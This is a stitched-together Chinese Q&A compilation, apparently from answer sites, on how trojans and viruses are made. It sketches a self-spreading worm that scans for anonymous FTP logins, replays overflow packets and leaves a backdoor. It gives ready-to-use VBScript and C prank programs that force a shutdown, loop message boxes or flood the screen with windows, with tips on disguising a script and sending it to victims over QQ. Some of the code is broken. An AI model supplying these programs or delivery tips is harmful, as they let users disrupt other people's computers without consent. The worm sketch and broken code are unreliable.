病毒或木马是怎样研究出来的?
常见的木马病毒是使用C++Builder、VC、VB和Delphi等计算机语言编写出来的。
木马怎么编辑?
一个典型的蠕虫病毒有两个功能型部件:传播和破坏,流行的蠕虫病毒大都是利用操作系统或者应用程序的漏洞(以弱口令和溢出最为常见),但常常并不会对宿主机造成“致命”的破坏。这两个特点使蠕虫病毒比普通电脑病毒传播得更快,影响力更大。一般来说,单一的蠕虫病毒只针对某种特定的漏洞进行攻击,所以一旦这种漏洞得到大范围修补,病毒也就没有了生存空间。
更新这种设计,我把传播部件拆分开来:把扫描、攻击和破坏脚本化,主程序则负责解析这些脚本。例如针对ftp弱口令进行扫描,我们可以定义如下脚本:
code:
uid = iscript-0a21-2331-x #随机唯一编号
using tcp;
port 21;
send “user anonymous”;
send crlf;
send “pass fake@nothing.com”
send crlf;
if (find “200”) resulrt ok;
next;
[copy to clipboard]
解析了这段脚本后(我想这种脚本是很容易读懂的),我们再定义一系列的过程,把我们的蠕虫体upload上去,一次完整的传播动作就完成了。如果是溢出漏洞,为了简单起见我们可以采集远程溢出的数据包,然后修改ip地址等必要数据,再转发溢出数据包进行溢出(这种情况下要实现connect-back就不容易了,不过这些具体问题就待有心人去研究吧),例如:
code:
using raw;
ip offset at 12;
send “\x1a\xb2\xcc” ……
[copy to clipboard]d
主程序在完成传播后留下一个后门,其他宿主机可以通过这个后门与本地的蠕虫病毒同步传播脚本,这样每次有新的漏洞产生,宿主机的传播方式可以很快地得到升级。我们当然不会仅满足于这样一个蠕虫程序,扫描/攻击脚本的传播过程也是需要仔细处理的。
我们希望适应力(fitness)最强的脚本得到广泛的应用(看起来有点类似 蚁群算法和 ga),所以我们要求得每个个体的fitness,当它和另一个体取得联系的时候就可以决定谁的传播脚本将取代另一个:
fitness = number of host infected / number of host scanned
但也不能仅凭fitness就修改传播脚本,我个人觉得一个合适的概率是75%,20%的机会保持各自的传播脚本,剩下的5%则交换脚本。这样在维持每种脚本都有一定生存空间的情况下使适应性最好的个体得到更多的传播机会,同时,一些在某种网络环境下适应性不强的脚本也有机会尝试不同的网络环境
我需要木马病毒
方法如下:在开始内点击运行输入at xx:xx shutdown -s,xx:xx代表几点几分是在几点几分关机输入shutdown.exe -s -t xx,xx代表多少秒钟后关机 如果要取消,就输入shutdown -a就可以取消了.
我听一个朋友说,有个人给他发个东西。他看了下。。说要输入一句话。。不然就管你机。是怎么编的。。。我知道关机命令和取消命令。。。不知道要对方怎么输才可以取消命令。。
脚本,例如下面的东西。就可以实现。
1。
首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看
把隐藏已知文件类型的扩展名前面的勾去掉.
然后我们开始制作.在桌面建立个记事本,然后把下面代码复制进去
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,你试试···"" ",0 ,true
dim a
do while(a "我是猪")
a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛,呵呵,猪"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"
复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序,这样你再压缩下用QQ发给你朋友,对方打
开了就在60秒内要关闭计算机,
结素任务都不行,他只能说他是猪才能解决问题。够坏吧? 注意哦,你可以把我是猪那个修改成任
意想说的话,要是对付你喜欢的人,
就修改成 我爱你 这样他只有说我爱你之后才不关闭计算机哦 也可以把时间修改为20 就是说打
开了20秒就关了,还没等对方打完就关机了 是不是叫对方很郁闷呢?
第2招编写VBS脚本
首先你可以看下面的
WScript.Echo("嘿,谢谢你打开我哦,我等你很久拉!"TSName)
WScript.Echo("你是可爱的小朋吗?")
WScript.Echo("哈,我想你拉,这你都不知道吗?")
WScript.Echo("怎么才来,说~是不是不关心我")
WScript.Echo("哼,我生气拉,等你这么久,心都凉啦。")
WScript.Echo("小强很生气,后果很严重哦。")
WScript.Echo("嘿嘿!你也会很惨滴哦")
WScript.Echo("是不是想清除我?")
WScript.Echo("那你要点上50下哦,不过会给你惊喜滴")
WScript.Echo("还剩49下,快点点哦")
WScript.Echo("还剩48下,快点,小笨蛋!")
WScript.Echo("还剩47下对,就这样快点点!")
WScript.Echo("还剩46下。你啊就是笨,要快哦,我先不打扰你工作。")
WScript.Echo("还剩45下,记得要快哦!")
WScript.Echo("还剩43下")
WScript.Echo("还剩42下")
WScript.Echo("还剩41下")
WScript.Echo("还剩40下")
WScript.Echo("还剩39下")
WScript.Echo("还剩38下")
WScript.Echo("还剩37下")
WScript.Echo("还剩36下")
WScript.Echo("还剩35下")
WScript.Echo("还剩34下")
WScript.Echo("还剩33下")
WScript.Echo("还剩32下")
WScript.Echo("还剩30下")
WScript.Echo("还剩29下")
WScript.Echo("还剩28下")
WScript.Echo("还剩27下")
WScript.Echo("还剩26下")
WScript.Echo("还剩25下")
WScript.Echo("还剩24下")
WScript.Echo("还剩23下")
WScript.Echo("还剩22下")
WScript.Echo("还剩21下")
WScript.Echo("还剩20下")
WScript.Echo("还剩19下")
WScript.Echo("还剩18下")
WScript.Echo("还剩17下")
WScript.Echo("还剩16下")
WScript.Echo("还剩15下")
WScript.Echo("还剩14下")
WScript.Echo("还剩13下停停!!!慢点,我有话要说")
WScript.Echo("还剩12下,你继续点我就会消失滴")
WScript.Echo("还剩11下,以后就看不到我拉。555555")
WScript.Echo("还剩10下,你现在可以选择停止!")
WScript.Echo("还剩9下。你还点啊,不要我拉?")
WScript.Echo("还剩8下,有点伤心拉,干嘛丢弃人家")
WScript.Echo("还剩7下。疯了,你有点负意!")
WScript.Echo("还剩6下。对。你就点吧,我恨你!")
WScript.Echo("还剩5下,不明白,删除我你就好吗?")
WScript.Echo("还剩4下!真要删除我?")
WScript.Echo("还剩3下。可是我真的很眷恋你。。。")
WScript.Echo("还剩2下。不要这么绝情嘛,人家是爱你的!")
WScript.Echo("还剩1下。哼,既然你这么绝情。也别怪我无义!!!")
WScript.Echo("我本因该消失的,不过我留恋你滴芳容,上帝又给了一次机会。")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
把这个复制在记事本,把后缀修改成.vbs
在打开呢就会先说第一句的 嘿,谢谢你打开我哦,我等你很久拉!
他无论是点关闭或者是点确定都会再说第2句
再点就说地3句 会按顺序说完
你们注意哦,最后10句话,只是10句,你要是把这个复制再粘贴N次,那他还有个打完呢?
这样才做到整人了,要是给喜欢的人发去啊,那就写你要说的话吧,双引号里面的可以随便更改
这个最简单的就是结素任务来结束它
2。
把以下代码复制到记事本中 然后重命名为后缀名为VBS的文件~
do
msgbox"爽死你~"
loop
Windows XP的关机是由Shutdown.exe程序来控制的,位于Windows\System32文件夹中。如
果想让Windows 2000也实现同样的效果,可以把Shutdown.exe复制到系统目录下。
比如你的电脑要在22:00关机,可以选择“开始→运行”,输入“at 22:00 Shutdown -s”,
这样,到了22点电脑就会出现“系统关机”对话框,默认有30秒钟的倒计时并提示你保存工
作。如果你想以倒计时的方式关机,可以输入“Shutdown.exe -s -t 3600”,这里表示60
分钟后自动关机,“3600”代表60分钟。
设置好自动关机后,如果想取消的话,可以在运行中输入“shutdown -a”。另外输入
“shutdown -i”,则可以打开设置自动关机对话框,对自动关机进行设置。
Shutdown.exe的参数,每个都具有特定的用途,执行每一个都会产生不同的效果,比如
“-s”就表示关闭本地计算机,“-a”表示取消关机操作,下面列出了更多参数,大家
可以在Shutdown.exe中按需使用。
-f:强行关闭应用程序
-m \\计算机名:控制远程计算机
-i:显示图形用户界面,但必须是Shutdown的第一个选项
-l:注销当前用户
-r:关机并重启
-t 时间:设置关机倒计时
-c "消息内容":输入关机对话框中的消息内容(不能超127个字符)
有时候,我们需要定时关闭计算机,下面介绍一个在Windows XP下实现定时关机的简单方
法。
指定系统在22分钟后自动关闭:点击“开始→运行”,在“打开”中输入命令“Shutdown
-s -t 1320”(注意:引号不输入,参数之间有空格,1320的单位是秒),单击“确定”
按钮即可。
指定系统在某个时间(比如12:00)自动关闭:在“打开”中输入命令
“at 12:00 Shutdown -s”即可。
取消定时关机:在“打开”中输入命令“Shutdown -a”即可。
能的实现都是使用“Shutdown”命令实现的,shutdown的参数是在命令行窗口中输入
“shutdown”。笔者认为最有用的是“-i”参数,可以调出“远程关机对话框”,
能方便地实现局域网内计算机的远程关机,有兴趣的朋友可以试一试。
开始-程序-附件-系统工具-计划任务-添加任务计划-下一步-浏览
-c:\windows\system32\shadow.exe-下一步-选好要关机的时间,
下一步-输入用户名和密码,只要是系统里有的用户就行,但一定要有密码,
没有也要设一个,下一步,选上“在完成时打开此任务的高级属性”,
在运行栏后面加上“ -S”引号不要哦。
关于编写病毒木马程序
1.做一个木马不是很复杂。就window平台而言,需要了解的东西大致有:注册表,pe,windowsAPI(尤其是windows hook),动态链接技术。当然也要有网络方面的,起码的socket编程技术,如果能熟悉tcp/ip协议族就更好。。
2。木马更多的时候是社会工程学的知识用的比较多。。计算机方面的知识是相对来说比较基础的,是技术性的。
3。如果有独立编写木马的水平,而不仅仅只是在现有的木马基础上改进。那可以去网络安全公司,杀毒软件公司,主要从事的是网络安全,信息安全,系统安全方面的工作。
4。如果是干正道,应该在10k/月以上。如果是歪门邪道估计再加2-3倍。(当然这两者都有一个前提:就是能”独立完成工作“)。
5。说到学习周期,请参照第一条;在第一条中出现的名词看看有几个不”熟悉“,个数乘以6个月就是学习周期。如果一个都不熟悉,那么在之前的数字上再乘以2可以得到答案。
6。说句题外话:其实很多能独立编写木马的人都不是计算机专业科班出身,更没有把钱做为原始驱动力。如果没有对安全技术的强烈的兴趣,并且非常关心”工资“----那么。。。。。。。。。
木马、病毒都是用些什么程序语言写出来的?
很多语言都可以写病毒的,VB VC C++ 易语言 很多很多的!
建议你订阅杂志《黑客X档案》,里边有很多关于入侵,漏洞利用和病毒原理的!
漏洞是什么?如何发现漏洞?如何编写木马和病毒?如何远程植入病毒?
很高兴为您解答:
漏洞是只你使用的软件或是系统的缺陷或是错误,可以被不法分子利用并且植入木马
你下载腾讯电脑管家的以后,但有系统漏洞的时候腾讯电脑管家会发现
编写木马或是病毒的话非常负责,这也是违法的行为不建议你这么做
阿狸计算机常用指南
1、使用电脑管家定期清理自己的垃圾,以保持自己的计算机常用常新;
2、使用电脑管家进行有效的拦截、清杀病毒。
3、定期进行全盘扫描,让病毒无所遁形,如有难以清除的病毒请尝试在“安全模式”进行。
4、保持良好的上网习惯,不要随意点开陌生人或者来历不明的网址或者链接,对于陌生人发送的任何文件不要随意打开。
祝楼主祝您工作、生活愉快!!
如何编制木马病毒?
c也可以编的出来 如果你想整人的话又不伤害机子
给你个安逸的 用C写
#include stdio.h
#include stdlib.h
main()
{
int i;
for(i=1;i=200;i++)
system("start cmd.exe");
}
就弹200个黑窗口的cmd就是了 也不会有什么破坏
你可以再发挥一下嘛